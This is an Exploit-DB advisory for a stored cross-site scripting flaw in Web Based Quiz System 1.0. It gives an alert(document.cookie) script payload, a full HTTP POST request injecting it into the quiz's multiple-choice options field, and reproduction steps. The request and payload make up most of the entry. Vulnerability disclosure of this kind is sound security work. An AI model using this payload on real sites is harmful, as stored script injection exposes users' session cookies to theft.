Web Based Quiz System 1.0 – ‘MCQ options’ Persistent Cross-Site Scripting

  • 作者: Praharsh Kumar Singh
    日期: 2021-03-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49605/
  • # Exploit Title: Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting
# Date: 2021-03-02
# Exploit Author: Praharsh Kumar Singh
# Vendor Homepage: https://www.sourcecodester.com
# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
# Software: Web Based Quiz System
# Version: 1.0
# Vulnerability Type: Cross-site Scripting
# Vulnerability: Persistent/Stored XSS
# Tested on: Parrot OS
 
# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe
# in adding questions in options parameter affected from this vulnerability.
# payload: </script><script >alert(document.cookie)</script>
 
POST /onlinequiz_0/update.php?q=addqns&n=1&eid=603d2f766b0d0&ch=4 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/onlinequiz_0/dashboard.php?q=4&step=2&eid=603d2f766b0d0&n=1
Cookie: PHPSESSID=icctgctoho6nlqc6cbp8bftkeh
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

qns1=1&11=1&12=1&13=%3C%2Fscript%3E%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&14=1&ans1=c
 
POC:
# go to url http://localhost:8080/admin.php
# login and add question
# then put the above payload in MCQ options parameter
# then fill the remaining details
# then click add
# go to url http://localhost:8080/login.php
# then login to user account
# then attempt the quiz while attempting the quiz xss pop up there..!